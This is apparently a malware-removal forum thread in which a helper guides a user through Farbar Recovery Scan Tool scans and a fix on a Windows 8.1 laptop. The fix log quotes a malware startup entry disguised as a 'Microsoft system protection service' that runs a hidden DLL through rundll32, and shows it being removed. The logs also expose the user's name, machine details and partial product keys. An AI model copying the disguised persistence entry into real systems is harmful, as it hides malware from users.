C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

ATTENTION: ==> Could not access BCD.

LastRegBack: 2016-07-06 08:47

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 19:33:29)
Running from C:\Users\Melinda\Desktop
Windows 8.1 Single Language (Update) (X64) (2015-06-07 13:37:40)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3305678368-1645044794-3837945535-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-3305678368-1645044794-3837945535-501 - Limited - Disabled)
Melinda (S-1-5-21-3305678368-1645044794-3837945535-1001 - Administrator - Enabled) => C:\Users\Melinda

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.016.20039 - Adobe Systems Incorporated)
Amazon 1Button App (HKLM-x32\...\{0A7D6F3C-F2AB-48ED-BE23-99791BFF87D6}) (Version: 1.0.0.4 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Amazon Kindle) (Version:  - Amazon)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{2A07BB79-284C-4C61-B8D5-4E146FAC91FB}) (Version: 1.0.0.8 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{AE5E3C86-2633-4DAF-A7F4-C43D1E738BAE}) (Version: 3.1.3300.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{17FFE63C-6734-4950-B488-134B5A2505F7}) (Version: 2.04.0280 - Aviata Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.1.34.40 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
DSC/AA Factory Installer (Version: 3.5.6426.22 - PC-Doctor, Inc.) Hidden
DW WLAN Card (HKLM\...\DW WLAN Card) (Version: 6.30.223.249 - Dell Inc.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3945 - Intel Corporation)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.9042 - McAfee, Inc.)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.6965.2058 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
My Dell Learning Center (HKLM\...\{DC451A89-545E-4297-AC2C-9F239CE7D695}) (Version: 1.0.510.0 - Dell Inc.)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6925.1018 - Microsoft Corporation) Hidden
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.18 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.39054 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7288 - Realtek Semiconductor Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.0.9980 - Broadcom Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll => No Fil (the data entry has 1 more characters).
CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08FAB16F-38D1-41A7-A96A-27901C8DACFA} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-07-06] (McAfee, Inc.)
Task: {2362FB59-156D-4BDE-BDE5-26155C688609} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-07-05] (Realtek Semiconductor)
Task: {31B9C7D7-07AF-4C60-8D5C-22F4E164D916} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {35276823-28FA-4B1D-A581-AEFDA66847C0} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-22] (CyberLink Corp.)
Task: {371AA7E5-B4A6-48B8-8F37-50DE4E85E7F0} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-07-06] (McAfee, Inc.)
Task: {3758DF87-0E29-486A-9D29-63718D338695} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {3F26D171-C361-4616-B754-E0147B333FF5} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {583C724D-DC81-4886-9B12-752F09269FF2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\mcafee\platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {6FE5AA89-8DE2-40BA-B60E-9AED6F64693F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7FFABFC7-6E75-48D4-80F9-F8C8DD52D5AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {8746F630-AB2F-4E58-A6FB-10BF265BF8C4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-04-22] (Adobe Systems Incorporated)
Task: {945473E0-878B-46DC-B517-7309904670DE} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {9AB09B0D-E28A-4778-9000-7C93877ABF69} - System32\Tasks\{A79AE70B-3222-4200-AA0C-607D18CAF9F8} => pcalua.exe -a "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" -c scenario=install scenariosubtype=uninstall baseurl="C:\Program Files\Microsoft Office 15" platform=x86 version=15.0.4833.1001 culture=en-us productstoremove=O365HomePremRetail_en-us_x-none
Task: {B3BEE599-13E1-4D78-AAD7-3C40ADE7E7AD} - System32\Tasks\Aviata\PowerRegister\Dell Reminder (Melinda) => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {B4B694C2-6A51-4D72-BA7B-BEEBAD2B8856} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-03-05] (CyberLink)
Task: {DA28AAC1-0DC1-4DFD-ACF4-024C75A6E47E} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {DAD9A46E-5BFD-410F-AD1B-5979F02CE72D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-06-10] (Microsoft Corporation)
Task: {DD6537A5-A686-4071-B1C0-3AB7EE5B2110} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-31] (McAfee, Inc.)
Task: {EC51E01A-E785-4E5F-848B-388C16A74DCC} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-01-10] (Synaptics Incorporated)
Task: {FFE8401F-7883-442B-944A-693A8A7FE7B7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-09-24 22:20 - 2014-09-24 22:20 - 00049408 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btwleapi.dll
2016-07-06 14:28 - 2016-07-06 14:28 - 08919752 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00462160 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 00022528 _____ () C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 06032384 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.BeautyShot.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00045568 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.ContentManager.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017408 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00009728 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Configuration.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017920 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00006656 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Configuration.dll
2015-06-07 14:58 - 2013-03-05 05:40 - 00626240 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-03-05 18:41 - 2013-03-05 18:41 - 00015424 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00214352 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\Ledger.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00114000 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\zlib1.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2015-06-07 15:06 - 2013-12-10 17:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{4C08EABD-F39F-4DFE-BC62-A885074076A0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B1AEF5A5-BC60-420F-91A2-C4667097F18D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD Cinema\PowerDVDCinema12.exe
FirewallRules: [{19E3C5FD-7368-411F-B10B-7BEF913EB8AE}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B3B5A316-3040-4953-B2BE-76A614395690}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{D7B1A2E0-AA3B-4786-B557-351B04116EEE}] => (Allow) C:\Users\Melinda\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{D8426297-B91F-4EA5-B90C-961F0D036FEF}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{453DE781-1C77-4A11-9241-94E64E7C2586}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{15B1885B-E1A4-4E9F-95EE-072770B3A83F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{01D1F782-0259-4566-A237-B192FAF6E7F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{13FB821E-9FEE-4A0F-8DE3-9387CB447704}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC9FA691-E063-4647-BC4A-4767178AC238}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{A75DB17C-A945-438F-ACCF-FF579716F5F1}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{F7E58AA9-6B4D-41E1-BDAC-75A0FC8DA9BD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F9AEAE24-EC5B-4EB5-A672-C5E2F0DC979A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B00CC2B1-DB54-432A-A099-3EE6AC06DCA0}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A6643D8F-FF92-4964-AC6A-905B1D49FF70}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6566F34D-CE0D-46FA-8939-42F3C461B65E}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [{58CDD88C-012F-47C2-8B07-68319DE5DB71}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [TCP Query User{161CA715-DC23-4B44-B509-22AAE82DD6FB}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [UDP Query User{CBF9CD12-1F76-4583-AA64-B05AFF1110F8}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [{59F538D1-BD40-4AAD-8FAC-ABA0A4531DE0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D777539B-2BA0-4B86-9B02-67EC1BD7FEF0}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4610417F-63B7-47E2-8499-00D1BD39C1A1}] => (Allow) LPort=17061
FirewallRules: [{4FA72F00-0BC4-4FB5-9F0A-3424AA44D5B6}] => (Allow) LPort=17061
FirewallRules: [{8343E0A9-1541-4C05-8336-8E24C926455D}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{1D0FED7E-B603-43E3-B728-90DE466D8BF1}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{B448FF33-50E1-430E-A442-F801742453A7}] => (Allow) C:\Windows\system32\rundll32.exe

==================== Restore Points =========================

06-07-2016 11:10:41 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (07/06/2016 07:23:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17416 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: cec

Start Time: 01d1d7aad9017ea7

Termination Time: 31

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id: 63c44cca-439e-11e6-8257-acd1b8d216c6

Faulting package full name:

Faulting package-relative application ID:

Error: (07/06/2016 02:56:58 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:58 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:16 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=KHGM9
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:16 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=KHGM9
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:05 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:56:05 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:20 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:20 PM) (Source: Software Protection Platform Service) (EventID: 1017) (User: )
Description: Installation of the Proof of Purchase failed. 0x8004F80B
Partial Pkey=TXVJR
ACID=?
Detailed Error[?]

Error: (07/06/2016 02:55:18 PM) (Source: Microsoft Office 16) (EventID: 2011) (User: )
Description: Office Subscription licensing exception: Error Code: 0x803D0014; CorrelationId: {8DC124C2-B55D-4871-8311-D58C4529C826}

System errors:
=============
Error: (07/06/2016 07:29:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee OOBE Service2 service failed to start due to the following error:
%%1083 = The executable program that this service is configured to run in does not implement the service.

Error: (07/06/2016 05:22:34 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (07/06/2016 12:17:45 PM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {00020827-0000-0000-C000-000000000046}

Error: (07/06/2016 12:14:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 3 time(s).

Error: (07/06/2016 12:05:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 2 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (07/06/2016 12:05:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Microsoft Office ClickToRun Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (07/06/2016 08:47:45 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/06/2016 08:47:15 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/06/2016 08:17:45 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/06/2016 08:17:15 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}

==================== Memory info ===========================

Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 36%
Total physical RAM: 4000.18 MB
Available physical RAM: 2541.99 MB
Total Virtual: 4832.18 MB
Available Virtual: 3266.08 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:922.04 GB) (Free:878.85 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E2DE1C3A)

Partition: GPT.

==================== End of Addition.txt ============================


  • 0

#4
RKinner

RKinner

    Malware Expert

  • Expert
  • 20,001 posts
  • MVP

Sorry I missed one

 

 
Download the attached fixlist.txt to the same location as FRST
 
Attached File  fixlist.txt   488bytes   70 downloads
 
Run FRST and press Fix  (This one shouldn't need a reboot)
A fix log will be generated please post that 
 
 
Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.
 
 
 

  • 0

#5
MelindavW

MelindavW

    New Member

  • Topic Starter
  • Member
  • Pip
  • 3 posts

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by Melinda (2016-07-06 20:01:55) Run:2
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\Run: [Microsoft system protection service] => rundll32.exe "C:\Users\Melinda\AppData\Local\Microsoft\Protect\protecthost.dll",DllInstall
C:\Users\Melinda\AppData\Local\Microsoft\Protect

*****************

HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft system protection service => value removed successfully
"C:\Users\Melinda\AppData\Local\Microsoft\Protect" => not found.

==== End of Fixlog 20:01:55 ====

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by Melinda (administrator) on MEL (06-07-2016 20:03:23)
Running from C:\Users\Melinda\Desktop
Loaded Profiles: Melinda (Available Profiles: Melinda & Administrator)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
